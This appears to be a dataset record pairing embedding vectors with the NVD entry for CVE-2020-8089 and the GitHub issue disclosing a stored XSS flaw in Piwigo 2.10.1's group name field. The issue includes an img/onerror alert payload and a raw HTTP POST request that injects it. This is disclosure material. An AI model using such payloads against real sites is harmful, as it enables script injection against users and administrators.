-0.02137209288775921, -0.016431886702775955, 0.020688064396381378, 0.010306030511856079, -0.010275629349052906, -0.014911822974681854, -0.007296304684132338, 0.0018069754587486386, -0.003395441686734557, -0.0007524313987232745, 0.002441602060571313, -0.006388066802173853, -0.0005614734254777431, 0.015550249256193638, 0.015284238383173943, -0.014022585935890675, 0.0004538814537227154, -0.0051910169422626495, -0.01568705588579178, -0.005001008976250887, -0.013999784365296364, -0.0042903791181743145, -0.005806642584502697, 0.021326489746570587, 0.00978160835802555, -0.009371191263198853, 0.000545322778634727, 0.008398350328207016, 0.009006376378238201, 0.0164926890283823, 0.006228459998965263, 0.006969491019845009, 0.007987933233380318, 0.01776954159140587, -0.00684028584510088, 0.02827318012714386, 0.006612276192754507, 0.01596066728234291, -0.0005044710705988109, 0.006296862848103046, 0.015519848093390465, -0.001937130931764841, 0.026251496747136116, -0.0013167549623176455, -0.009044378064572811, 0.019000792875885963, 0.008535156026482582, 0.012403718195855618, 0.0056280349381268024, -0.017328724265098572, 0.020216844975948334, 0.011689288541674614, 0.008725164458155632, -0.0003992541751358658, 0.07332786172628403, 0.0017423727549612522, -0.0071784998290240765, -0.02106807939708233, -0.0041839745827019215, 0.008071537129580975, 0.0029394228477030993, 0.0002757490146905184, -0.01928960531949997, 0.021387293934822083, 0.008649161085486412, 0.011392875574529171, -0.0006094504497013986, -0.003762157168239355, 0.01172728929668665, 0.006813684478402138, 0.018848786130547523, -0.020627262070775032, 0.011567682959139347, -0.011286471039056778, 0.014068187214434147, 0.0008863870170898736, 0.005863644648343325, 0.01799755170941353, 0.004297979641705751, 0.009675203822553158, -0.01421259343624115, 0.009439594112336636, -0.008763166144490242, -0.03093329258263111, 0.005396225489675999, 0.004951606970280409, -0.0042409771122038364, 0.013688171282410622, 0.005757240578532219, 0.011696888133883476, 0.007630718406289816, -0.006775682792067528, 0.01425059512257576, 0.009834811091423035, 0.008846769109368324, 0.0011305472580716014, 0.01875758357346058, 0.02479223534464836, -0.008033535443246365, -0.025445861741900444, -0.011902096681296825, 0.001013692351989448, -0.007592717185616493, 0.000002219233238065499, -0.01982162706553936, 0.008580758236348629, -0.0020653861574828625, 0.0010564441327005625, 0.01224411092698574, 0.02187371253967285, -0.011210467666387558, 0.022998560220003128, 0.024169009178876877, -0.0011419476941227913, -0.018590375781059265, -0.008147540502250195, 0.0008697613375261426 ]
2
CVE-2020-8089
2020-02-10T16:15:14.267000
Piwigo 2.10.1 is affected by stored XSS via the Group Name Field to the group_list page.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1150" }, { "source": "[email protected]", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://piwigo.org/forum/viewforum.php?id=23" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:2.10.1:*:*:*:*:*:*:*", "matchCriteriaId": "8E8B6457-1AF4-4B29-AF6E-9682E45BB2A9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Piwigo/Piwigo/issues/1150
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
Description: Piwigo version 2.10.1 is affected by stored cross site scripting vulnerability. This vulnerability exists in "Group Name" Field in "group_list" page. How to reproduce: 1. Login into the application. 2. Go to the "Users" -> "Groups" page from life navigation menu. 3. Click on "Add Group" button and then in "Group Name" field insert the payload <img src="X" onerror="alert(document.domain)"> and hit add button. CVSS Score: CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N ********************************************************************************************************* POST /piwig/admin.php?page=group_list HTTP/1.1 Host: 172.16.163.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 122 Origin: http://172.16.163.1 Connection: close Cookie: pwg_display_thumbnail=no_display_thumbnail; phavsz=1141x490x1; pwg_id=i6juu2ls6m174g1f0abcjodjs7; user_auth=eyJpdiI6IkxnaGp4T0RGd1BiK2VDUzNWNHpRdlE9PSIsInZhbHVlIjoiU29tK1pzdDQzUDBKcWlRZk5VN04wVUNxR1JXUjdBd1Q5QUtOaUJRbUhyNGVjc0xETWUwWFd0RkpBV2ZJOFBKd3R4N2o2clNTRlhWaWtmc2ttQ2dMM3VrWU0rZ1B5cDJlZnpoUGFCZ2hmaHpJTURTVXJQdCtlbEpyeEp6RzhNUVAiLCJtYWMiOiI4YjY2NTU4N2JhOTc2MzkyZTcwOTQyNWQ3OThkNDZkZjMyODgxYjhjZGQ0NGQ2NTFhMjg3NWRmMzM2OGIwZDYzIn0%3D groupname=%3Cimg+src%3DX+onerror%3Dalert%28document.domain%29%3E&submit_add=Add&pwg_token=46695f2721b77a2840903ba6298796be ********************************************************************************************************* ![Create_Group_title](https://user-images.githubusercontent.com/25206084/72731247-5b00f780-3bb9-11ea-908e-5a57f0f7c4d6.JPG) ![Create_Group_title_2](https://user-images.githubusercontent.com/25206084/72731283-6d7b3100-3bb9-11ea-9e5a-5b5d9914934b.JPG)
Stored Cross-Site Scripting vulnerability in Piwigo CMS
https://api.github.com/repos/Piwigo/Piwigo/issues/1150/comments
1
2020-01-20T13:47:13
2020-03-25T14:32:53Z
https://github.com/Piwigo/Piwigo/issues/1150
552,310,420
1,150
true
This is a GitHub Issue repo:Piwigo owner:Piwigo Title : Stored Cross-Site Scripting vulnerability in Piwigo CMS Issue date: --- start body --- Description: Piwigo version 2.10.1 is affected by stored cross site scripting vulnerability. This vulnerability exists in "Group Name" Field in "group_list" page. How to reproduce: 1. Login into the application. 2. Go to the "Users" -> "Groups" page from life navigation menu. 3. Click on "Add Group" button and then in "Group Name" field insert the payload <img src="X" onerror="alert(document.domain)"> and hit add button. CVSS Score: CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N ********************************************************************************************************* POST /piwig/admin.php?page=group_list HTTP/1.1 Host: 172.16.163.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 122 Origin: http://172.16.163.1 Connection: close Cookie: pwg_display_thumbnail=no_display_thumbnail; phavsz=1141x490x1; pwg_id=i6juu2ls6m174g1f0abcjodjs7; user_auth=eyJpdiI6IkxnaGp4T0RGd1BiK2VDUzNWNHpRdlE9PSIsInZhbHVlIjoiU29tK1pzdDQzUDBKcWlRZk5VN04wVUNxR1JXUjdBd1Q5QUtOaUJRbUhyNGVjc0xETWUwWFd0RkpBV2ZJOFBKd3R4N2o2clNTRlhWaWtmc2ttQ2dMM3VrWU0rZ1B5cDJlZnpoUGFCZ2hmaHpJTURTVXJQdCtlbEpyeEp6RzhNUVAiLCJtYWMiOiI4YjY2NTU4N2JhOTc2MzkyZTcwOTQyNWQ3OThkNDZkZjMyODgxYjhjZGQ0NGQ2NTFhMjg3NWRmMzM2OGIwZDYzIn0%3D groupname=%3Cimg+src%3DX+onerror%3Dalert%28document.domain%29%3E&submit_add=Add&pwg_token=46695f2721b77a2840903ba6298796be ********************************************************************************************************* ![Create_Group_title](https://user-images.githubusercontent.com/25206084/72731247-5b00f780-3bb9-11ea-908e-5a57f0f7c4d6.JPG) ![Create_Group_title_2](https://user-images.githubusercontent.com/25206084/72731283-6d7b3100-3bb9-11ea-9e5a-5b5d9914934b.JPG) --- end body ---
2,148
[ -0.040990401059389114, 0.00403587007895112, -0.004070964641869068, 0.021365545690059662, 0.055084362626075745, 0.02020040713250637, 0.02668587490916252, 0.038603976368904114, 0.016297895461320877, 0.01335697527974844, 0.010984585620462894, -0.00864729005843401, -0.02060750313103199, 0.002137256320565939, -0.0026706932112574577, 0.025099603459239006, -0.012500668875873089, 0.00457281619310379, -0.018754512071609497, -0.021309394389390945, 0.02330276370048523, -0.0313885398209095, -0.011672438122332096, 0.013764072209596634, -0.018922965973615646, 0.015090644359588623, 0.01124428492039442, 0.015202946960926056, 0.006355618126690388, 0.03759325295686722, 0.03405572474002838, 0.0029830343555659056, 0.006534600164741278, 0.014458943158388138, 0.0327642448246479, -0.016115404665470123, 0.021716490387916565, 0.09607476741075516, -0.030939331278204918, 0.003307658713310957, 0.019442366436123848, -0.05227680131793022, -0.012058477848768234, 0.014044827781617641, -0.015750421211123466, 0.02118305303156376, 0.00509221525862813, -0.022600872442126274, -0.024102918803691864, 0.036217547953128815, 0.009812428615987301, -0.045707106590270996, -0.02173052914440632, -0.029591701924800873, -0.04632477089762688, -0.035599883645772934, 0.043657585978507996, 0.009173708036541939, -0.00002748613951553125, 0.018810663372278214, -0.017392845824360847, 0.006934677716344595, 0.007994532585144043, 0.03823899105191231, -0.01245153695344925, 0.029675928875803947, -0.006818865891546011, 0.026531459763646126, 0.003519980702549219, 0.01443086750805378, 0.019610818475484848, -0.011040736921131611, 0.03501029685139656, -0.031304314732551575, 0.01209357287734747, -0.002233766485005617, 0.06429316848516464, -0.001384478877298534, -0.018136849626898766, -0.0005773049197159708, -0.04963769391179085, 0.04391026496887207, -0.02180071733891964, -0.005846747662872076, 0.02797735296189785, 0.027851013466715813, -0.061597906053066254, -0.08725902438163757, -0.004839534871280193, -0.010128279216587543, 0.007861172780394554, 0.015638118609786034, -0.014767775312066078, -0.029254794120788574, 0.0014283470809459686, -0.029226718470454216, 0.006102937273681164, -0.01767360232770443, -0.02442578785121441, 0.015343325212597847, -0.047925081104040146, -0.021435733884572983, -0.011511003598570824, -0.008471817709505558, 0.009889636188745499, 0.02552073635160923, 0.0320623554289341, -0.004667571745812893, -0.007762908469885588, 0.10320597141981125, 0.04941308870911598, -0.010956509970128536, -0.040990401059389114, -0.007397925481200218, 0.013146407902240753, 0.03405572474002838, -0.02327468805015087, -0.030349742621183395, -0.0453701987862587, -0.005436141509562731, -0.05179951712489128, -0.04466830939054489, -0.02344314195215702, 0.011040736921131611, -0.01934410072863102, 0.0291705671697855, -0.024243297055363655, -0.004411381669342518, -0.015076606534421444, 0.03388727083802223, -0.03293269872665405, -0.03164122253656387, 0.03155699372291565, -0.009187745861709118, -0.018880853429436684, 0.03770555555820465, -0.031472768634557724, 0.013553504832088947, 0.011440814472734928, -0.02596994675695896, -0.042562637478113174, -0.011700513772666454, 0.01634000986814499, -0.015652157366275787, -0.031135860830545425, 0.0017336694290861487, 0.015006418339908123, -0.028342336416244507, -0.0242292582988739, 0.0035603393334895372, -0.006464411038905382, -0.022193776443600655, 0.009335143491625786, 0.032567717134952545, 0.02552073635160923, -0.014950267039239407, 0.01817896217107773, 0.024846922606229782, -0.029760155826807022, -0.010465187020599842, -0.01624174602329731, -0.03880050405859947, 0.020888259634375572, -0.01196021307259798, 0.004320135805755854, -0.04497713968157768, 0.03388727083802223, -0.014458943158388138, -0.023050082847476006, 0.0052466313354671, 0.006562675815075636, -0.019470442086458206, -0.005923955235630274, -0.02050923928618431, -0.04789700359106064, 0.023457178846001625, 0.013020067475736141, -0.028566941618919373, -0.027528144419193268, -0.025562850758433342, -0.012746330350637436, -0.009854542091488838, -0.029367096722126007, -0.01982138678431511, 0.00032484368421137333, -0.0019530102144926786, 0.02961977757513523, -0.007987513206899166, 0.009777333587408066, -0.029114415869116783, -0.007075055968016386, -0.015315249562263489, 0.025071527808904648, -0.03840744495391846, 0.006169617176055908, -0.005541425198316574, -0.01998984068632126, -0.03610524535179138, 0.053624432533979416, -0.031192012131214142, 0.042422257363796234, -0.005365952383726835, 0.008198080584406853, -0.01972312107682228, -0.04124308377504349, 0.03930586576461792, -0.01120919082313776, 0.0255909264087677, -0.03675098344683647, -0.01356052327901125, -0.04893580079078674, 0.021070752292871475, 0.008668347261846066, 0.023878313601017, -0.012304139323532581, 0.014241357333958149, 0.026096286252141, -0.032876547425985336, 0.0017670092638581991, -0.015596006065607071, -0.00011921170516870916, 0.005636180285364389, -0.0042920601554214954, -0.008871895261108875, -0.054129790514707565, -0.03077087737619877, -0.01931602507829666, 0.029563626274466515, -0.05216449871659279, -0.0035269996151328087, -0.01086526457220316, -0.03677906095981598, -0.0175753366202116, -0.015750421211123466, 0.023597557097673416, -0.03562796115875244, -0.01593291386961937, 0.006843431852757931, -0.023148346692323685, -0.008464799262583256, 0.021604187786579132, 0.008619214408099651, 0.011833872646093369, 0.0018354435451328754, 0.014655472710728645, 0.056516218930482864, -0.03663868084549904, -0.00023557197710033506, -0.029563626274466515, 0.0179122444242239, -0.013328899629414082, 0.009707145392894745, -0.00998088251799345, -0.0016424236819148064, -0.007050489541143179, -0.006945205852389336, 0.012325196526944637, 0.018852777779102325, 0.005699350498616695, -0.012458555400371552, 0.0021442752331495285, 0.016354046761989594, -0.06670767068862915, 0.025745341554284096, 0.026966631412506104, 0.013630712404847145, 0.012746330350637436, -0.0116022489964962, 0.019624857231974602, -0.04070964455604553, -0.00736283091828227, -0.02719123661518097, -0.0119391568005085, -0.04949731379747391, -0.003477867227047682, 0.013588598929345608, 0.02316238544881344, 0.013139389455318451, 0.014922191388905048, 0.01110390666872263, 0.008619214408099651, -0.0058292001485824585, 0.017631487920880318, 0.017322655767202377, 0.02153399959206581, 0.012837576679885387, 0.013062180951237679, -0.013300823979079723, 0.006267881952226162, 0.04056926816701889, -0.024860959500074387, 0.00560459541156888, -0.038912806659936905, -0.02272721379995346, 0.012100591324269772, 0.0545790009200573, 0.0030637518502771854, 0.04632477089762688, -0.013392070308327675, -0.009812428615987301, -0.013293805532157421, 0.010402016341686249, -0.07288430631160736, 0.010051071643829346, -0.02483288384974003, 0.020326746627688408, 0.0030374310445040464, 0.04267494007945061, -0.019596781581640244, -0.03408380225300789, 0.038267068564891815, -0.04949731379747391, -0.013244672678411007, 0.0011212700046598911, -0.034785691648721695, 0.011679457500576973, 0.013174483552575111, -0.004593872930854559, 0.048711199313402176, 0.005362443160265684, 0.0006093286792747676, 0.0004667571629397571, -0.045398276299238205, -0.002984789200127125, 0.01593291386961937, 0.02446790039539337, -0.019063344225287437, -0.020088104531168938, -0.023766010999679565, 0.006046786438673735, 0.010121260769665241, -0.02747199311852455, 0.0027812409680336714, -0.004404362756758928, -0.033213455229997635, -0.02623666450381279, -0.03183775022625923, 0.032904624938964844, 0.022151662036776543, -0.005794105585664511, -0.008029626682400703, 0.007678681518882513, -0.009770315140485764, 0.02862309291958809, 0.04104655236005783, 0.0012414687080308795, -0.0009563257335685194, -0.0049834223464131355, 0.06086793914437294, -0.05690927803516388, 0.0008751696441322565, 0.02657357230782509, -0.001940727117471397, 0.0317254476249218, -0.007433020044118166, -0.016901522874832153, 0.041439611464738846, -0.005906408187001944, -0.00805068388581276, -0.014683548361063004, 0.029872458428144455, -0.027107009664177895, 0.015062568709254265, 0.008380572311580181, 0.03107970952987671, 0.014950267039239407, 0.004088511690497398, 0.011146020144224167, 0.00025377728161402047, -0.04012005776166916, -0.02418714575469494, 0.016129443421959877, -0.03975507616996765, 0.002500484697520733, -0.04887964949011803, 0.0011440814705565572, 0.00009980004688259214, 0.021758604794740677, -0.04374181479215622, 0.016704993322491646, -0.006288938689976931, -0.01572234556078911, -0.014852002263069153, -0.020649617537856102, 0.031921979039907455, 0.0024864468723535538, 0.023485254496335983, 0.004235908854752779, 0.027935240417718887, -0.02521190419793129, -0.027050858363509178, 0.08366534113883972, -0.02695259265601635, -0.053961336612701416, -0.010163373313844204, 0.029395172372460365, -0.03312923014163971, -0.03815476596355438, 0.023569481447339058, -0.009531672112643719, 0.023667745292186737, -0.028440602123737335, -0.035094521939754486, -0.015231022611260414, -0.01733669452369213, -0.0036638681776821613, 0.018908929079771042, -0.01332188118249178, 0.013027086853981018, 0.002621560823172331, 0.003558584488928318, 0.026040134951472282, -0.031613145023584366, -0.011911081150174141, 0.043489132076501846, 0.05076071619987488, 0.03630177304148674, 0.008843819610774517, 0.021786680445075035, 0.027542181313037872, 0.01872643642127514, -0.00201793503947556, -0.0007102254312485456, 0.021070752292871475, -0.02733161486685276, -0.0038990015164017677, -0.017182277515530586, 0.03545950725674629, 0.07816252112388611, -0.010345865041017532, -0.0033953951206058264, -0.009679069742560387, -0.01979331113398075, -0.0364983044564724, -0.009271972812712193, 0.009293030016124249, -0.017729753628373146, -0.0034322442952543497, 0.0015459137503057718, -0.007320717442780733, -0.0072084148414433, 0.03419610112905502, -0.014852002263069153, 0.019779272377490997, -0.03268001973628998, -0.013911468908190727, 0.02411695569753647, 0.0060081821866333485, 0.011174095794558525, 0.01298497337847948, -0.01269017904996872, -0.011988288722932339, -0.016522500663995743, -0.017659563571214676, -0.032595790922641754, 0.016255782917141914, -0.016845371574163437, -0.0014151866780593991, 0.03183775022625923, 0.01938621513545513, -0.015567930415272713, 0.015989065170288086, -0.0402604378759861, 0.0030321667436510324, 0.034954145550727844, 0.007320717442780733, 0.007938381284475327, 0.026896441355347633, 0.03245541453361511, -0.021169016137719154, -0.008970160037279129, 0.024580202996730804, 0.0313885398209095, 0.00999492034316063, -0.016999786719679832, 0.014641434885561466, 0.016733068972826004, -0.008191061206161976, 0.006594260688871145, 0.032567717134952545, -0.019119495525956154, -0.003786698915064335, 0.001452913274988532, 0.02425733394920826, 0.05163106322288513, 0.011932137422263622, 0.004888666793704033, -0.025745341554284096, -0.019133534282445908, 0.030827028676867485, 0.0020144255831837654, 0.019849462434649467, -0.02368178404867649, -0.011384663172066212, -0.010022995993494987, 0.012458555400371552, -0.02647530846297741, -0.03425225242972374, 0.03773362934589386, -0.004986931569874287, 0.03324153274297714, 0.019737159833312035, -0.0028830149676650763, 0.0179122444242239, 0.03402765095233917, -0.0002458810049574822, -0.04455600678920746, 0.027780823409557343, -0.018782587721943855, 0.05401748791337013, -0.02995668537914753, -0.013349956832826138, -0.01886681467294693, -0.058341134339571, -0.00859815813601017, -0.027457954362034798, 0.015259098261594772, 0.006548637989908457, 0.0022986913099884987, 0.00580814341083169, -0.0011353078298270702, -0.005759011022746563, -0.012297120876610279, 0.009489558637142181, 0.02575938031077385, 0.01590483821928501, 0.01805262267589569, 0.027457954362034798, -0.015315249562263489, -0.01836145482957363, -0.006892564240843058, -0.01269017904996872, 0.017799941822886467, 0.013069200329482555, -0.003276073606684804, 0.04834621399641037, -0.0053308578208088875, -0.015357363037765026, -0.021112864837050438, -0.01562408171594143, -0.01545562781393528, 0.03562796115875244, -0.06614615768194199, -0.020565390586853027, 0.013630712404847145, 0.05749886482954025, -0.021197091788053513, -0.004337682854384184, 0.004348211456090212, -0.04711088910698891, 0.006520562339574099, -0.0211549773812294, 0.006204711738973856, 0.005832709837704897, 0.025773417204618454, -0.002976015442982316, 0.029732080176472664, 0.014767775312066078, 0.012037421576678753, -0.0037094911094754934, 0.019498517736792564, -0.002007406670600176, 0.009075443260371685, -0.02306411974132061, 0.026798177510499954, -0.0001613251370145008, -0.013272748328745365, 0.03705981746315956, 0.006331051699817181, -0.005594066809862852, 0.035880640149116516, 0.0035340185277163982, -0.040344662964344025, -0.014206263236701488, 0.014781813137233257, -0.0028145806863904, 0.01955466717481613, -0.002009161515161395, -0.004660552833229303, -0.0010537130292505026, -0.01872643642127514, -0.009082462638616562, -0.009356199763715267, 0.01402377150952816, 0.025787455961108208, 0.005923955235630274, 0.018193000927567482, 0.017448997125029564, -0.048907727003097534, -0.021379582583904266, 0.0003079544403590262, 0.010570470243692398, 0.02654549665749073, -0.01941429078578949, 0.014234337955713272, -0.0060818810015916824, -0.012514706701040268, -0.006674978416413069, 0.019358139485120773, -0.015469665639102459, -0.03152891993522644, 0.0225166454911232, 0.021028637886047363, -0.006555656902492046, -0.008282307535409927, 0.020088104531168938, 0.031332388520240784, 0.006485467776656151, -0.024173106998205185, 0.01175666507333517, -0.006246825214475393, 0.02067769318819046, 0.051574911922216415, -0.016733068972826004, 0.016199631616473198, 0.0016740087885409594, 0.01576445996761322, 0.005250140558928251, -0.013146407902240753, 0.01621367037296295, 0.03759325295686722, -0.04245033487677574, 0.012970935553312302, -0.012444517575204372, 0.015553892590105534, 0.004334173630923033, 0.0043938341550529, 0.019442366436123848, 0.006741657853126526, -0.01197425089776516, -0.015890799462795258, 0.03823899105191231, -0.002846165793016553, -0.03214658424258232, -0.03223080933094025, 0.011812816374003887, 0.01054239459335804, 0.000030159355446812697, -0.007015394978225231, 0.02344314195215702, -0.01269017904996872, 0.0009159670444205403, -0.019666969776153564, 0.03251156583428383, -0.01743495836853981, -0.02747199311852455, 0.014543170109391212, 0.0020688220392912626, 0.013637731783092022, 0.026699913665652275, -0.023583518341183662, 0.012191837653517723, 0.027865050360560417, 0.00438330601900816, 0.0168874841183424, -0.02470654435455799, 0.009026311337947845, 0.039362017065286636, -0.006615317426621914, -0.0024355598725378513, -0.024060804396867752, -0.039726998656988144, 0.0008778017363511026, 0.004200814291834831, 0.012907765805721283, 0.01137764472514391, 0.006920639891177416, -0.014185206033289433, 0.0182491522282362, 0.005902898497879505, 0.03394342213869095, -0.001779292244464159, -0.016045216470956802, 0.008324421010911465, -0.027149122208356857, -0.013490334153175354, -0.010809113271534443, -0.016129443421959877, -0.019638894125819206, -0.02139362134039402, -0.016536539420485497, -0.00020080647664144635, -0.003251507645472884, 0.0035831506829708815, -0.019709084182977676, 0.00793136190623045, -0.005653727799654007, 0.0061871642246842384, 0.0000781401467975229, -0.012521726079285145, 0.010303751565515995, -0.005608104635030031, 0.02852482721209526, 0.02255875989794731, 0.00911053828895092, -0.017785904929041862, 0.01349735353142023, 0.032736171036958694, -0.018066659569740295, 0.02203935943543911, -0.06069948524236679, 0.0011870722519233823, -0.003621754702180624, 0.02620858885347843, 0.012226931750774384, 0.029086340218782425, -0.011525041423738003, 0.014697586186230183, -0.017659563571214676, 0.00647493964061141, 0.003428734838962555, 0.024748656898736954, -0.02351333014667034, 0.030939331278204918, 0.0027619388420134783, -0.008570082485675812, 0.0021670868154615164, 0.028089655563235283, -0.018852777779102325, 0.032090432941913605, -0.0023337858729064465, -0.008780649863183498, -0.03248349204659462, -0.0416361428797245, -0.009693107567727566, 0.009819447062909603, 0.027457954362034798, 0.000007203973382274853, -0.008359515108168125, 0.020860183984041214, -0.025773417204618454, -0.017224391922354698, 0.03284847363829613, 0.008605176582932472, -0.01784205622971058, 0.019470442086458206, 0.011314474046230316, -0.04090617597103119, 0.001317799324169755, 0.0154415899887681, -0.015652157366275787, -0.001127411494962871, 0.01180579699575901, -0.02992860972881317, 0.002065312582999468, -0.020579427480697632, 0.007015394978225231, -0.015259098261594772, 0.0020284634083509445, 0.002023199340328574, 0.023120271041989326, -0.024102918803691864, 0.008738536387681961, -0.031753525137901306, -0.001242346130311489, -0.0105774886906147, 0.00456228805705905, 0.004351720679551363, 0.020045991986989975, -0.021309394389390945, 0.0029654870741069317, 0.03644215315580368, -0.009328124113380909, 0.0052150459960103035, 0.0320623554289341, 0.01934410072863102, -0.010191448964178562, -0.008577100932598114, 0.006594260688871145, -0.007889248430728912, -0.015848686918616295, -0.017617451027035713, -0.0009580804617144167, 0.027696596458554268, 0.006425807252526283, -0.007036451715976, 0.031332388520240784, 0.0025478622410446405, -0.011868967674672604, 0.024931149557232857, -0.044471777975559235, -0.001842462457716465, -0.02903018891811371, 0.014922191388905048, 0.0042394185438752174, -0.010802093893289566, 0.027219312265515327, -0.008492874912917614, -0.023386990651488304, 0.009615899063646793, -0.003562093945220113, 0.00876661203801632, 0.009903674013912678, -0.010114241391420364, 0.0036603587213903666, -0.020312709733843803, 0.02685432881116867, 0.025633038952946663, 0.003549810964614153, -0.010451149195432663, 0.019779272377490997, 0.022572796791791916, -0.0144168296828866, -0.04028851166367531, -0.009910693392157555, -0.012121648527681828, -0.0008637639111839235, 0.03613331913948059, -0.037789780646562576, 0.03419610112905502, 0.012500668875873089, -0.0042218710295856, -0.026601647958159447, 0.001958274282515049, -0.017687639221549034, -0.01073190476745367, 0.027050858363509178, -0.03144469112157822, 0.0038217934779822826, -0.012479612603783607, 0.0024759185034781694, -0.009629936888813972, -0.019666969776153564, -0.041608065366744995, 0.0035691128578037024, 0.002263596747070551, -0.018979117274284363, 0.014655472710728645, 0.02401869185268879, -0.035599883645772934, 0.011033717542886734, -0.020242521539330482, 0.012023383751511574, 0.013953582383692265, -0.010226543992757797, 0.018164925277233124, 0.018993156030774117, 0.004955346696078777, -0.007861172780394554, 0.009152651764452457, 0.01764552667737007, -0.004120097029954195, -0.006215239875018597, -0.015343325212597847, -0.012016364373266697, -0.0199617650359869, -0.013532447628676891, 0.020396936684846878, 0.016606727614998817, 0.01838953047990799, 0.017013825476169586, 0.04149576276540756, -0.03436455503106117, 0.03124816343188286, 0.008022608235478401, 0.002151294145733118, -0.02418714575469494, 0.02446790039539337, 0.011440814472734928, -0.013027086853981018, 0.007075055968016386, 0.01593291386961937, -0.027626408264040947, 0.002800542861223221, 0.03357844054698944, 0.0017029617447406054, -0.006376674864441156, -0.030349742621183395, 0.01753322407603264, 0.0011370625579729676, -0.01982138678431511, -0.013785128481686115, 0.021000562235713005, 0.014199243858456612, 0.0025180319789797068, -0.03565603494644165, -0.018614135682582855, -0.010142317041754723, -0.013378032483160496, -0.024594241753220558, -0.019807348027825356, -0.0026724478229880333, -0.03282039612531662, -0.013609656132757664, -0.02432752400636673, 0.0014783567748963833, 0.004821987356990576, -0.013371013104915619, 0.009538691490888596, 0.01648038811981678, 0.004551759455353022, -0.022853553295135498, -0.034617237746715546, -0.0055098398588597775, 0.004478061106055975, 0.014297508634626865, 0.008759592659771442, 0.00021429592743515968, -0.02668587490916252, 0.009587823413312435, 0.005976597312837839, 0.003744585672393441, -0.018417606130242348, 0.007580416742712259, 0.007615511305630207, 0.013300823979079723, 0.012816519476473331, -0.010331827215850353, 0.005232593510299921, 0.0033059041015803814, 0.004825497046113014, -0.00736984983086586, -0.026531459763646126, -0.004765836056321859, -0.01212866697460413, -0.02568919025361538, 0.006362637039273977, 0.009033329784870148, -0.002923373831436038, 0.003442772664129734, 0.005306291859596968, 0.014065884985029697, -0.00015112578694242984, 0.020860183984041214, -0.0020109161268919706, 0.013216597028076649, -0.013146407902240753, -0.005692331586033106, 0.00721543375402689, 0.013616674579679966, 0.000764183234423399, -0.03144469112157822, -0.02340102754533291, 0.005853766575455666, 0.033185381442308426, -0.026587611064314842, 0.002632089192047715, 0.010514318943023682, 0.0014055356150493026, -0.039221636950969696, -0.001317799324169755, -0.002770712599158287, 0.019372176378965378, -0.0186000969260931, -0.008612195961177349, -0.022263964638113976, 0.007945399731397629, -0.02292374148964882, -0.017856093123555183, 0.005706369411200285, -0.05005882680416107, -0.0130481431260705, -0.01626981981098652, -0.008998235687613487, -0.020495200529694557, 0.02463635429739952, -0.03442070633172989, 0.04183267056941986, 0.0046008918434381485, 0.024046767503023148, 0.003430489683523774, -0.005755501799285412, -0.009524653665721416, -0.0005036063957959414, 0.008155967108905315, 0.03026551567018032, -0.021519960835576057, 0.03503837063908577, 0.02244645729660988, 0.014248375780880451, -0.02783697471022606, 0.019863499328494072, 0.025647077709436417, 0.018979117274284363, -0.0031497334130108356, 0.0189370047301054, -0.015343325212597847, -0.021042676642537117, -0.008464799262583256, 0.023499293252825737, -0.008556044660508633, 0.013286786153912544, 0.026124361902475357, -0.009868579916656017, 0.009791371412575245, -0.04767239838838577, -0.010100203566253185, 0.0474197193980217, -0.026840290054678917, -0.008317401632666588, 0.011532059870660305, 0.013111313804984093, -0.005720407236367464, -0.019456403329968452, -0.0030619970057159662, -0.013314861804246902, -0.008141929283738136, -0.0056291613727808, -0.031950052827596664, -0.021913019940257072, 0.0005527387256734073, 0.015918875113129616, 0.01269017904996872, -0.013827241957187653, -0.014767775312066078, 0.009700126014649868, -0.018108773976564407, -0.021674377843737602, -0.00016110579599626362, 0.0035533204209059477, -0.008885933086276054, 0.035262975841760635, 0.0494692400097847, -0.030237440019845963, 0.02947939932346344, -0.03545950725674629, -0.0019301987485960126, 0.029591701924800873, -0.007222452666610479, 0.016971711069345474, -0.018305303528904915, 0.021744566038250923, -0.0182491522282362, 0.002730353968217969, -0.001986349932849407, 0.01900719292461872, -0.015413514338433743, 0.004811459220945835, 0.026742026209831238, 0.011342549696564674, 